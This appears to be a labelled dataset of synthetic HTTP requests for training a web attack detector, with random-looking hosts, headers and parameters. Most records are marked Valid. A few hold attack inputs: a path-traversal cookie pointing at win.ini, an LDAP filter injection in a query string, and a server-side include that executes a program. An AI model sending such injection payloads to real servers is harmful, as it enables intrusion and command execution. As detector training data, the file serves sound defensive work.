From: kkwee@uev2tN.ch
If-Modified-Since: Fri, 24 Aug 07 06:11:57 CET
If-Unmodified-Since: Fri, 04 Jun 04 04:52:00 GMT
If-Match: "fXBFb-F-i7sV5w0wft"
If-None-Match: "06mhv5jfZ4j--ok.Jk"
If-Range: *
Max-Forwards: 3
MIME-Version: 0.6
Pragma: sue='w'
Proxy-Authorization: Digest opaque="peradza"
Authorization: Basic ZERob2V1cWE6b3lhZQ==
Range: 74705-710
Referer: http://yerhgtj.st/shhRsgs/asha/lyenemb.fgf
TE: gzip,trailers
Trailer: Range
User-Agent: edtfu/5.2.4.6.4
UA-CPU: PowerPC
UA-Disp: 4382,1693,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 260x3490
Via: 3.6 184.197.93.4, rm1/2.5 11.116.105.41, nhiyo/6.9 23.132.116.51
Transfer-Encoding: compress
Upgrade: zufZE2/7.5, owei/6.5, slroee/5.9
Warning: 393 16.23.206.208 "aeeyywi82NiChtaec" 
X-Forwarded-For: 69.243.92.99
X-Serial-Number: 40823
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 775
Start - Id: 25353
class: Valid
GET /u1Sosjyszzcb/aemsiuggeecBeOnotd/K-between1kF2WlocationbetweenLuMautoexec/78p6ops/ey1tsluxaV7uP8G/N21mochaZV.dll? HTTP/1.1
Host: www.a6H3nci.it
Connection: close
Accept: application/postscript
Accept-Charset: iso-2022-kr;q=0.9
Accept-Encoding: compress, deflate, compress;q=0.1
Accept-Language: cB-reeemc0s;q=0.1, gferlc-7t;q=0.5
Cache-Control: only-if-cached
Client-ip: 116.248.127.206
Cookie: esHi=eeutqaoib5ma;uje=8066;F2Di5n=o3%/e>sla;uiihssh8nehrent=iya
Cookie2: $Version="094"
Date: Sat, 29 Jul 06 05:56:52 GMT
ETag: W/"H-nR_fhu2JQLg5Kk35B"
Expect: 100-continue
From: hait@1onahThh5t.net
If-Modified-Since: Mon, 05 Apr 04 14:18:28 CET
If-Unmodified-Since: Wed, 20 Jun 07 22:20:41 CET
If-Match: *
If-None-Match: *
If-Range: "ud0zAlOHAEQ-xj4APKI"
Max-Forwards: 45
MIME-Version: 6.1
Pragma: tiawe=fazs0h2c
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: Digest qop=auth
Range: 4947-
Referer: /nac5h/6oeead/Uuenuan/th0n.jsp
TE: deflate;q=0.7,trailers,deflate
Trailer: From
User-Agent: Mozilla/3.3 (X11; U; Open BSD i386 9.4; ld-te; rv:2.7.2) Gecko/07376038
UA-CPU: 68000
UA-Disp: 761,7667,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 894x439
Via: ettp/0.9 www.ontOR.html:340, 8.3 www.seett.jpeg, 5.6 www.Nloic.htm
Transfer-Encoding: identity
Upgrade: 5itIE/7.2, iAlg/7.5
Warning: 127 197.55.244.77 "fosrtaeywgeT" 
X-Forwarded-For: 149.199.155.11
X-Serial-Number: 29493838100482691776
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25353
Start - Id: 33131
class: Valid
POST /dzj.jpeg? HTTP/1.0
Content-Length: 120
Content-Language: mxgeenv
Content-Encoding: compress
Content-Location: http://slsto.gov/hdDrt/nepl.png
Content-MD5: YXNxbnJjbjNlYWl0dHIxZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Sep 05 01:20:03 UTC
Last-Modified: Wed, 05 Sep 07 04:46:27 UTC
Host: 237.194.242.109
Connection: close
Accept: video/mpeg, text/*;q=0.4, video/mpeg
Accept-Charset: iso-8859-4, iso-8859-1;q=0.3, iso-8859-2, iso-8859-3, windows-1254;q=0.6
Accept-Encoding: gzip;q=0.7, gzip;q=0.9, gzip;q=0.3, compress, compress;q=0.5
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 156.100.161.187
Cookie: nwmtqe=Itatah ldtnaicj;yhwfej=linkybing2;gohmj7Idtcieg=inr rio
Cookie2: $Version="24"
Date: Wed, 11 Oct 06 05:06:41 GMT
ETag: W/"y05-2wAWbf.A9q_gfP"
Expect: 100-continue
From: lcteseg@iehlhresle.uk
If-Modified-Since: Sun, 28 Oct 07 02:26:34 CET
If-Unmodified-Since: Thu, 29 Mar 07 03:31:23 UTC
If-Match: "mFCa0QXlNE@Y42eiNKf_"
If-None-Match: *
If-Range: Sun, 22 May 05 09:48:22 GMT
Max-Forwards: 7679
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM eTJzbmhobTRzMm5vamx0ZGtzZU1sdnRzb2xjYXVlS3VuMXNyeHN2eUVudGU5dA==
Authorization: Digest opaque="d3Nact"
Range: -787,80891-464,53849-
Referer: http://www.eaAiTgi.be/spke6b9/rlgot7/Ri5et7/ulrdfdx/ahnO.jsp
TE: gzip;q=0.2,trailers
Trailer: Pragma
User-Agent: epAt/1.4
UA-CPU: MIPS
UA-Disp: 035,199,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6581x441
Via: 6.1 www.osmnsW.shtml:746, 6.3 www.hiean.jpeg, nneesr/6.5 www.siut.png
Transfer-Encoding: eoea
Upgrade: i1oE/1.8, htoee/2.9, lnsedh/9.7, rNtlnM/5.3
Warning: 903 www.rzea4yr.htm "r5iGesaOlmea2osamrqa" "Tue, 10 Feb 04 12:04:44 GMT"
X-Forwarded-For: 92.19.31.36
X-Serial-Number: 0421946796861302632
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

relajlnrthiza=59803473&cstse=7390757&4emn=etsbsalaeo&f8ErBS0oOoa=a&nom9kcm6sie=b7XA8GG&Iioena==d'a&ecstNgt6r4riih=ow

End - Id: 33131
Start - Id: 17431
class: Valid
GET /cumtcdtolyht/egy/dnjR85aDqFOd/ninP-16/4QEDRUT9XzbmSGUv/qehbrmogiaeheHqi.tiff?spChbHd5hpspmR=5925648&ateontn=r%3Ae5dh5&baisdojhent=68&yeewehlsIpwid=11&are=47&7iNtaseon=l HTTP/1.1
Host: www.whbi0cnoyx.be
Connection: keep-alive
Accept: image/*, text/*;q=0.9
Accept-Charset: iso-8859-6;q=0.2, windows-1250
Accept-Encoding: identity;q=0.7
Accept-Language: xDo-era;q=0.1, e-senan1lk, euE3be-NosoiiIf;q=0.3, sdme-usie
Cache-Control: no-cache
Client-ip: 0.107.219.106
Cookie: agumpetsele=9053;@mIaDOUMNV=hoeopt;asbkl=ezs3bdre
Cookie2: $Version="13"
Date: Thu, 24 Feb 05 24:54:16 UTC
ETag: "PmVRQckLfLMkVxZEe4."
Expect: eeOjeim=shOr;el0lberd=Lrnleij
From: asobeo@yaOtdneg.de
If-Modified-Since: Sat, 14 Jan 06 02:46:44 UTC
If-Unmodified-Since: Tue, 01 Dec 09 12:42:33 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 17 May 06 12:58:05 UTC
Max-Forwards: 667
MIME-Version: 8.5
Pragma: b='d'
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: NTLM OGwyRGFxcnR0b2huT3Nhc2tld2E0YXgydXRncmtvYjd5bGVpaUhjRmF1dGxpaA==
Range: 8-
Referer: http://htlatay.net/zsutD/eamvTt/5itemuya/nowihwhn.pdf
TE: trailers,chunked;q=0.6,trailers
Trailer: Host
User-Agent: Mozilla/5.4 (Machintosh; U; Mac OS X 6.7; ho-uy; rv:6.7.3) Gecko/09672080
UA-CPU: MIPS
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 769x9384
Via: oog/5.4 174.94.51.196, 1.3 www.hatno.jpeg, HTTP/2.9 www.gSeoencc.js
Transfer-Encoding: deflate
Upgrade: tnn/6.0, dhp2e/7.9, 7eo/4.5, 6ei8oh/4.0
Warning: 682 www.8mri.png "1onheHntbcn" "Fri, 11 Dec 09 19:10:46 CET"
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 891452454
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17431
Start - Id: 11287
class: Valid
GET /hWm1/thr/pYH8jVq3p/oy8X980KpyrkHTZaVEi/aWoteehlat/drsmphmtfodh44/r5veH15xpuDW/9_Y/dbXi4GpLvAFPi/wBncf8Ns2qGktdeco.bin? HTTP/1.0
Host: www.4qavti.com
Connection: ueddd
Accept: application/x-tar;q=0.3, text/*, audio/*;q=0.0
Accept-Charset: windows-1251;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 101.47.35.21
Cookie: an=aqme
Cookie2: $Version="30"
Date: Wed, 19 Dec 07 04:11:21 UTC
ETag: W/"drNtQVRUKVb9s28"
Expect: 100-continue
From: 7urSh@tin1aU.biz
If-Modified-Since: Thu, 30 Jun 05 09:07:30 GMT
If-Unmodified-Since: Sun, 01 Jun 08 20:42:55 GMT
If-Match: "@4mSvjT7Y4m1QcNi"
If-None-Match: "CjI3W4.UhtZLbnXOfL"
If-Range: "smMmB4LH5wdUOjKoPoD0"
Max-Forwards: 0428
MIME-Version: 8.1
Pragma: tto='t0Ilwee'
Proxy-Authorization: Digest nc=3c06C92E
Authorization: Digest uri=http://77waO.be/ntlia0n/pwn3dh.dll
Range: 51-551841
Referer: /L8ear/h0ph6nsa/iha67/ooOaoteu/ceat.conf
TE: trailers,gzip;q=0.8
Trailer: Date
User-Agent: Mozilla/0.4 (Windows; U; WinNT 4.3; 3t-re; rv:1.6.5) Gecko/78529009
UA-CPU: StrongARM
UA-Disp: 2659,0505,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 2360x349
Via: 1.8 253.129.207.125, 7.8 15.77.77.114, 7.1 212.243.7.166:9891
Transfer-Encoding: deflate
Upgrade: Iinf/7.1, oavrcs/0.2, aMti/2.8, uud/0.6, sprmls/3.8
Warning: 665 8.130.241.150:99 "miciymt" 
X-Forwarded-For: 144.202.151.128
X-Serial-Number: 7492268797432274
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11287
Start - Id: 29970
class: Valid
GET /gxj2vPpk4o9V/uiore1tdMt3r9a/skE2nQ/h1o2JDO0n/8Neifuuh1a/inqEldsamf8Gaargx/sY8oX/5tG9coh/iMlN6LS/unl4iasttisehbpqf/mwIF@xE0-.gif?betweenME068U=emeop%3Aertadcy&ofsfot5=noa&tkrc=t4nxry&SeJe1gH1dN6-=dh8nxY&uLl=%7Eth+dpnEuo HTTP/1.0
Host: www.9eohtSnpn.ch:645
Connection: h7mntaf
Accept: text/*;q=0.2, text/xml;q=0.4
Accept-Charset: windows-1250, x-mac-turkish
Accept-Encoding: 
Accept-Language: *
Cache-Control: LkNLdrha='5'
Client-ip: 247.18.105.163
Cookie: 6hrzNsjjrx2e=6iGctYZG-;dbsr=ei;mtSrh5dt=7te;ootestn=mscriptoptidocument;7abu=em4Y3z3pL
Cookie2: $Version="71"
Date: Sat, 15 Sep 07 14:05:03 CET
ETag: W/"hu@1fke@0C9Ln8qFHkn"
Expect: rieTrx
From: nAen2Ew@Xo7tyav4o.biz
If-Modified-Since: Sun, 21 Jan 07 08:37:29 UTC
If-Unmodified-Since: Thu, 24 Jul 08 06:25:56 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 18 Jan 07 20:17:42 GMT
Max-Forwards: 9
MIME-Version: 0.1
Pragma: oytA6i='h9lEwzhi'
Proxy-Authorization: atyh matlcbq=soaSa
Authorization: NTLM ZmhyU3R6T3RyZzZpcGxodFRtMWVoaGJndHBvc29vY2d1aWEwaDc=
Range: 89712-
Referer: /adod/Rgiaa/e8Aahec.zip
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.8 (Machintosh; U; PPC 5.4; de-ma; rv:2.1.8) Gecko/51673853
UA-CPU: 68000
UA-Disp: 644,8528,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 797x977
Via: 7.5 53.121.189.61
Transfer-Encoding: compress
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 80.188.232.109
X-Serial-Number: 2857393
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29970
Start - Id: 17679
class: Valid
GET /natinncee/mMdQuShSFTkSRB.QiR.msf?Tstiroo4c4lpqg=87534&An=eEXX4qcWCIz HTTP/1.1
Host: www.an3ecs.ch:3094
Connection: close
Accept: video/*, video/quicktime;q=0.5, image/jpeg;q=0.6
Accept-Charset: iso-8859-9;q=0.4, windows-1250;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: ire-nl;q=0.7, unlne-e, ccfBdA-hdbbeovt, fds6runc-fo;q=0.5
Cache-Control: no-store
Client-ip: 219.60.27.189
Cookie: fttniIah3n=nkb11jPg@Gqb;u5aetuMe=ns\ o@uinclude;ah=603262;eEe6hss=delete$uinetcatx;iabe9elrteA=6965687567;ausrted5te8e=436516
Cookie2: $Version="982"
Date: Fri, 19 Oct 07 11:26:35 GMT
ETag: "uqs9mPVvux7thahOP3un"
Expect: adoelhJ9=ha5n;bu1yaaq5=otenea
From: ham2@rhhtcs.de
If-Modified-Since: Thu, 30 Jul 09 20:45:11 CET
If-Unmodified-Since: Sat, 01 May 04 02:14:21 GMT
If-Match: "jfYNscBRuqqgms9Zt"
If-None-Match: *
If-Range: Sat, 20 Oct 07 06:51:25 GMT
Max-Forwards: 990
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: ds5n eodzhhx=stpesdru
Authorization: Basic TjRhcmVieTowdDBuc3d1Nw==
Range: 0-,07-
Referer: /nNbv/sSoe.txt
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.3 (Machintosh; U; Mac OS X 8.0; Ao-6e; rv:2.4.3) Gecko/95082425
UA-CPU: Sparc
UA-Disp: 3353,591,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5218x1595
Via: 9.0 www.uucmawsi.gif, 4.8 162.177.66.196, nafnl/6.6 48.232.88.54:60753
Transfer-Encoding: deflate
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 607 www.ab3E5tss.png "3i5gweeoi8uw5re" 
X-Forwarded-For: 255.19.115.5
X-Serial-Number: 09480693646047521886
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17679
Start - Id: 28425
class: Valid
GET /zMaGdM1ZFKqq0d/Z89t8Dvfvw/passwdhU7zHGms/WV_sbF.m-saccess_log/euirogaEl2oeooinvoa/u0sgiuQi1iacwtia2odr/s9S-nKRPg@A/sw7lis/eoaoulr.swf?8vei=i9aatFtneutom&YzmN2c63=794638&arppzb2e6lrV=tq&ltt3tb=x4_Kgp&09Yqh=idl HTTP/1.1
Host: www.oemFmflM.it
Connection: eM28a
Accept: */*;q=0.6
Accept-Charset: iso-2022-kr, shift_jis;q=0.9, x-mac-ce
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2885
Client-ip: 218.83.162.0
Cookie: cylouL7h=between]qo ttt  ranhtpassrO&e ;Abt=19;seasg=0428877554;kQlLcumnzpr1=str
Cookie2: $Version="80"
Date: Wed, 31 Mar 10 19:39:13 UTC
ETag: W/"1gX9YQdgjmVgQfs"
Expect: 100-continue
From: oBcae9t@txO3eond.biz
If-Modified-Since: Thu, 30 Aug 07 20:10:10 UTC
If-Unmodified-Since: Wed, 13 Oct 04 11:31:35 CET
If-Match: "zMDQ5Mfl9MXaYzRf"
If-None-Match: *
If-Range: Sat, 22 Dec 07 24:39:23 UTC
Max-Forwards: 14
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic TDcxeWh0OmV0N2F0bmVl
Authorization: Digest realm
Range: 9246-,43437-,-51100
Referer: /leopcfsm/elidhmE/2hue.cgi
TE: trailers
Trailer: Accept-Encoding
User-Agent: trcNbs8n (t3at85JTS; oen0i_8Ht_; gTFC@Bft5; nP.1i-8)
UA-CPU: PowerPC
UA-Disp: 4475,557,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6329x3487
Via: 1.4 www.eaty2w.html, HTTP/9.7 www.Sodkzny.png, 14gina/3.8 www.iace.jpg
Transfer-Encoding: gzip
Upgrade: fioa/5.4, weeo/7.8, l0s/3.4, srerh/3.7
Warning: 999 www.inZhH.jpeg:2 "ret1" 
X-Forwarded-For: 7.153.57.18
X-Serial-Number: 15983235
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28425
Start - Id: 25423
class: Valid
GET /uAbfJQZ@MI9QlnYEdR/yVttelnetvZHPpHd/DhmDEo6Uoincludeedsock_streaminput/apoIoe7rblncve6/f8-Q0tbv8NTXs.php? HTTP/1.1
Host: www.xeurwiffe.com:80
Connection: keep-alive
Accept: application/x-tar, audio/*, audio/basic
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *
Cache-Control: min-fresh=228
Client-ip: 141.90.56.165
Cookie: aN=16;HsHJFOstyleKincludeA=prthsA;quOsirs=ct/amwnss4dQstr;atvoryvosyw=iet1PinillaVaons;thwnYnrq=etcor EWdservicese3lu
Cookie2: $Version="78"
Date: Wed, 21 Jan 04 08:14:23 GMT
ETag: W/"NuB1T865FwH.zLE"
Expect: eNIat9e5=hialone
From: ledpneia@lcpqUt.de
If-Modified-Since: Tue, 26 Aug 08 01:41:33 GMT
If-Unmodified-Since: Sat, 06 Aug 05 04:07:01 UTC
If-Match: "FlQO9cJN@LxHgab3obJ"
If-None-Match: "7mEwrOqSFDKM7gY8CE4l"
If-Range: "1gHtvqw.a8wkCztO"
Max-Forwards: 63
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: hmMc hcaent=h2ppqntm
Authorization: Digest nc=e9eEf1d1
Range: 792212-0
Referer: http://www.o7doe.fr/edurg/ri7eg/otTko/u8otpf.ace
TE: trailers,deflate;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.5 (Machintosh; U; PPC Mac OS X 6.6; pr-7o; rv:7.8.0) Gecko/48828854
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 407x092
Via: 1.6 www.9aoeeos.css, 2.8 www.e95um9L.gif
Transfer-Encoding: gzip
Upgrade: roti/6.6, neeqsd/9.8, ycfke/5.8, l52ps/7.9, Ahg/7.6
Warning: 257 2.176.158.197 "ifnht" 
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 588564161052
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25423
Start - Id: 46019
class: PathTransversal
POST /daOBMyGo/joGwdamreigLianbHmrn/Midauk/da3et8e/Emcse0droprh/.VxT/6kKSSvWbpozGae.H/soscweatHut/aacNgp/pNctoaoaitiIlE.exe? HTTP/1.1
Content-Length: 124
Content-Language: hwcy,v
Content-Encoding: deflate
Content-Location: http://Ziede6f.net/N5enr5ep.avi
Content-MD5: aW9pZGVzSHRlYXpwOHR5ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Dec 05 01:05:45 CET
Last-Modified: Sat, 28 Apr 07 13:02:24 GMT
Host: www.oomiyenu7e.org:6
Connection: p7oisse
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Cookie: pdl2oOirrsw=f:\\WINNT\\win.ini;IgpFF=pnZ6UtSyc
Expect: nenTinf=oiot;tc8mks7s
If-Modified-Since: Sun, 23 Sep 07 02:12:08 UTC
If-Match: "pTg1pU9ftaI75GUxz"
If-None-Match: *
Max-Forwards: 379
Referer: http://aebl2no.de/zaeCsr/Lcser/ttgnxe5u/prit/wItu09e.avi
User-Agent: Dol7eHct (fAXTXBSID)
Via: 3.4 www.Ssr6ael.css

Nbh3=9l3&ritOftCinrfeieh=rlyolqul&ad16lteiuawshU=enRnweettehfv4tj&eso=eAZ5k2F&le=geerhkolstnl9i&aacm97=09265&ia0sdegehdu=126

End - Id: 46019
Start - Id: 4261
class: Valid
POST /it3Ee10B2m4dciJ/n5bnonnuxawsmoysph1/OZDI7GkQcHQR4.exe? HTTP/1.0
Content-Length: 232
Content-Language: ss,edwHsre2
Content-Encoding: identity
Content-Location: http://kWsese.org/ataLstf.nsf
Content-MD5: bHl4YWhnNWF4b291ZjVmbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Nov 09 23:14:00 CET
Last-Modified: Fri, 15 Jun 07 13:01:08 GMT
Host: 169.216.100.34
Connection: efhedar
Accept: text/xml;q=0.0, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 113.87.214.25
Cookie: rrkn=ehomeeetiek8gusr;idneioreegtaIs=102;Tcis=saxtermda~fsd;rSiDih=8352
Cookie2: $Version="11"
Date: Sun, 02 Sep 07 14:02:43 GMT
ETag: W/"pcvTl5lbQuJNZw@"
Expect: 100-continue
From: sblb@seuhwa.net
If-Modified-Since: Sun, 08 Jun 08 17:09:37 UTC
If-Unmodified-Since: Mon, 24 Nov 08 22:38:46 GMT
If-Match: "_7HlfpgOMnFbsUWoW3kW"
If-None-Match: *
If-Range: *
Max-Forwards: 7197
MIME-Version: 0.5
Pragma: w8irmua='zweSGht'
Proxy-Authorization: Basic MnBJbm1EOnR4b3R4NjE=
Authorization: NTLM M291ZG53bm9ybXNhbWJobGh1aG9kVENpYXFscm5NdHNkc3Vh
Range: 09-
Referer: /YPeeome/eoc4ab/antHeej.asp
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.8 (X11; U; Open BSD i386 8.0; it-e8; rv:0.5.7) Gecko/56146127
UA-CPU: StrongARM
UA-Disp: 4721,826,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 193x5257
Via: FTP/4.1 www.utSm.gif:7171, YnEnlr/1.3 www.rxsaoos.shtml, 7.6 www.tuo83a.jpg:04
Transfer-Encoding: deflate
Upgrade: elldh/2.3, hhMe/5.9
Warning: 735 178.12.92.100 "folsftnS" 
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 62285156998436291420
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OulC1.7J3yu=9&ysrntororrreHf=o&ofweeae9fi=i$tN&BbortateEsh=aoii$varaoecho3Arasam&ano3ikiKroode= u8ineMboot.inita/|gi sy&@zf84cAnph-Ke=eovar7&csYie6m9=dxoyse+allea&RTWRbuXu5=730&musse=7500480&daBxchildrmG2lr=87&F2nPtatdi6=3

End - Id: 4261
Start - Id: 37943
class: LdapInjection
GET /KZovij/1Oehauo/sizyeAeA.sh?alphnnhdf=ocdutvae7udszoncr&nU84bnaptpha=io%7E0sN&ubed=jC0LAJ6gYhF&lro=oome6&thnirsiinldg=rQo8YgcM_igm&ze=59492529&3T9JAgTxp_-D=1eh0qhhTebesgne&dk=eh7exa&uy=o+gAvbscriptbti9oR6httperrtmp&res=%29+%28++++%7C+%28eoe8%3Der*%29&nbegruooGs=aGM0QWjVFLUI HTTP/1.0
Host: www.iddosn.be:26
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.2, deflate
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 218.10.80.95
Cookie: eriao=e_o_
Cookie2: $Version="513"
Date: Wed, 14 Jan 09 10:28:44 UTC
ETag: "3zpt6.sWVxOYSXK"
Expect: 0ignSd=o0nsnoi
From: p2udarel@zentnnsmu.org
If-Modified-Since: Tue, 23 Mar 10 23:55:27 UTC
If-Unmodified-Since: Fri, 11 Dec 09 19:49:34 UTC
If-Match: *
If-None-Match: "50JG9_b25xdD8wTN2U"
If-Range: "Rac18572haXkQj6nt-hB"
Max-Forwards: 86
MIME-Version: 3.4
Pragma: 6=dRt
Proxy-Authorization: Digest cnonce="aEoaal"
Authorization: hcdMp olout=settnn
Range: 504-,69-,78804-
Referer: /0bur.jpg
TE: deflate;q=0.9
Trailer: Accept-Language
User-Agent: 4knybniesE/4.5.4
UA-CPU: 68000
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8848x2681
Via: 6.4 www.rret.png, raOdsh/9.5 www.erUetera.tiff:92, btwede/7.5 222.33.118.83
Transfer-Encoding: chht; ethni=T5pAt
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 730 8.119.149.75:23926 "T2gnENdpnaaoi3hf" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 8812591
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37943
Start - Id: 40279
class: SSI
GET /pEgdfKPOuN.mspx?asmochaxHwcopyLH58=%3C%21--+++%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5CdkDhia%5Cenoi%5Ceviu.exe+++d%3A%5Cmcdrru%5Cwww.atinis.org%5CetTetoSt%5Cdatabase.mdb+++++%2Fx+++exporttofoxpro%22--%3E HTTP/1.0
Host: 193.25.99.119
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 28.25.194.6
Cookie: .0N_yshutdownY_SR=sdLHqNAzkrYX;kiee=fntyoB0;hlrmIkcAii=enyhctcMhwinntCoda:ew;Kcoelgone=9191;wa8YES=11330624;kOStImtosu=264614
Cookie2: $Version="114"
Date: Sat, 26 Dec 09 20:42:54 CET
ETag: W/"OW87M.Z_H28iIF_"
Expect: lheuo1=socdB;geseo=arismc
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Sat, 28 Jun 08 01:50:51 GMT
If-Match: *
If-None-Match: "ZptszONkLvdLgvg"
If-Range: *
Max-Forwards: 9
MIME-Version: 9.5
Pragma: E='0j91ari'
Proxy-Authorization: Tanare rhil=drTtinN
Authorization: Digest nc=596D85c6
Range: 5-,-0
Referer: /TrlqtN/vandhscs/6zh7aoe.mdb
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: jia7OrCkiS9o5J17tahy
UA-CPU: MIPS
UA-Disp: 7013,7944,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6936x3425
Via: 7.0 www.stpru.htm:54653, 7.9 www.mceik.shtml, FTP/6.4 www.o7tn3ERa.jpg
Transfer-Encoding: compress
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
X-Forwarded-For: 147.185.144.226
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40279
Start - Id: 1119
class: Valid
GET /qaLporhln/wkdetdosfBtsr3/cyp5XT6hpMH1PH8Qqh/@autoexec/e0wHnde/@V.tiff?KajE656=+aeeprstionwindow.opena&8ylT=6226502748&edudno3or30=rrrvar%7E&ueHk2f=68&eeel9oe=miTffn4xekas0if10&opoc7teDt0doch=nrett%2FAnnLkfvm&6XnQyc=eceIeIdnsOt6telneta&3ivh2=34&hrset=bgsound0%27%3Fmjj7m&dhAaw=taSKa&eiev=rgNeerefromet%40wdroprcp&usat=htaccesotvcna+yso&4ZpY=024&il=3gX1oJm&enhrdsiesa5Gz=aD6w5pnine8mieacen HTTP/1.1
Host: www.pe43fhz.de
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-cyrillic, windows-1254
Accept-Encoding: compress;q=0.7, compress;q=0.1, deflate;q=0.1
Accept-Language: faii5-my43Suv;q=0.9, 6ir-ei;q=0.6, itushnid-dl, latnh2Ie-N, nefd-lolIh
Cache-Control: no-cache
Client-ip: 179.209.57.142
Cookie: x2dtcspsaua1=o;mMV6JNRgsamSUH=us9eeqna;Ard=nVYz;6siMcl=unione;risadmin l
Cookie2: $Version="1"
Date: Fri, 15 Feb 08 21:15:03 GMT
ETag: "9.8uWdp@rqIR@bt4Dd6"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Fri, 05 Sep 08 04:09:49 CET
If-Unmodified-Since: Fri, 29 May 09 01:42:59 GMT
If-Match: *
If-None-Match: "GOsXReGap-PUu5g"
If-Range: "UpP23YI70kJfJZj20lMc"
Max-Forwards: 9908
MIME-Version: 9.9
Pragma: 6qx='sor'
Proxy-Authorization: 1roecw ynJns=ailepj5
Authorization: hAatc urFtse=tnheetz
Range: 634551-,48052-6687,-9
Referer: /wilno/mtyGBDl/hs1en.asmx
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 7.0; ie-4w; rv:1.5.5) Gecko/51794501
UA-CPU: 68000
UA-Disp: 504,2036,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8837x3320
Via: etsY/1.9 75.234.225.30:181, FTP/1.2 www.Eobu8Oy.gif
Transfer-Encoding: identity
Upgrade: nwt/2.1, 9Anoe/4.1, tte/7.6, oIr/1.1, 0rasra/0.1
Warning: 737 144.157.19.107 "tuN5hTIzo9baaeA" 
X-Forwarded-For: 194.217.109.144
X-Serial-Number: 704934
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 1119
Start - Id: 39574
class: SSI
